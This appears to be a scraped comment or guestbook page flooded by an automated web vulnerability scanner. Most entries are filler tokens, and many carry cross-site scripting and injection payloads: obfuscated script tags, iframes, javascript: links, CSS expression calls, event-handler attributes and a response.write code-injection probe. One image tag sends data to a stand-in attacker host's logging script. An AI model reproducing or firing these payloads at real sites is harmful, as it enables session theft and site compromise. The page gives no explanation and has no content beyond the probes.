  2021-05-06 04:52:45


  1


 • pHqghUme

  2021-05-06 04:52:45


  1


 • '+response.write(9807418*9081126)+'

  2021-05-06 04:52:44


  1


 • response.write(9807418*9081126)

  2021-05-06 04:52:42


  1


 • pHqghUme

  2021-05-06 04:52:41


  1


 • pHqghUme

  2021-05-06 04:52:41


  1<bSL2M1 x=9848>


 • pHqghUme

  2021-05-06 04:52:40


  1


 • pHqghUme

  2021-05-06 04:52:38


  1


 • pHqghUme

  2021-05-06 04:52:36


  1


 • pHqghUme

  2021-05-06 04:52:34


  1


 • pHqghUme

  2021-05-06 04:52:33


  1


 • pHqghUme

  2021-05-06 04:52:33


  1


 • pHqghUme<CCq1NI<

  2021-05-06 04:52:33


  1


 • pHqghUme

  2021-05-06 04:52:33


  1kGgdsHe


 • JlAgAk72

  2021-05-06 04:52:32


  1


 • pHqghUme

  2021-05-06 04:52:31


  1


 • pHqghUme

  2021-05-06 04:52:30


  1


 • pHqghUme

  2021-05-06 04:52:30


  1


 • pHqghUme

  2021-05-06 04:52:25


  1<ifRAme sRc=9814.com></IfRamE>


 • pHqghUme<img sRc='http://attacker-9156/log.php?

  2021-05-06 04:52:21


  1


 • pHqghUme

  2021-05-06 04:52:14


  1<W8LD1J>AI9IB[!+!]</W8LD1J>


 • pHqghUme<KS6nLz x=9205>

  2021-05-06 04:52:12


  1


 • pHqghUme

  2021-05-06 04:52:07


  1


 • pHqghUme

  2021-05-06 04:52:05


  1j339b <ScRiPt >Qezd(9995)</ScRiPt>


 • pHqghUme<ifRAme sRc=9373.com></IfRamE>

  2021-05-06 04:52:03


  1


 • pHqghUme

  2021-05-06 04:51:57


  1<% contenteditable onresize=Qezd(9615)>


 • pHqghUme<WTCXKY>R9OEW[!+!]</WTCXKY>

  2021-05-06 04:51:55


  1


 • pHqghUme

  2021-05-06 04:51:48


  1}body{acu:Expre/**/SSion(Qezd(9818))}


 • pHqghUme8YsHG <ScRiPt >yehz(9764)</ScRiPt>

  2021-05-06 04:51:45


  1


 • pHqghUme

  2021-05-06 04:51:40


  1


 • pHqghUme

  2021-05-06 04:51:38


  1<sbrQYp<


 • pHqghUme<% contenteditable onresize=yehz(9072)>

  2021-05-06 04:51:37


  1


 • pHqghUme

  2021-05-06 04:51:37


  <a HrEF=jaVaScRiPT:>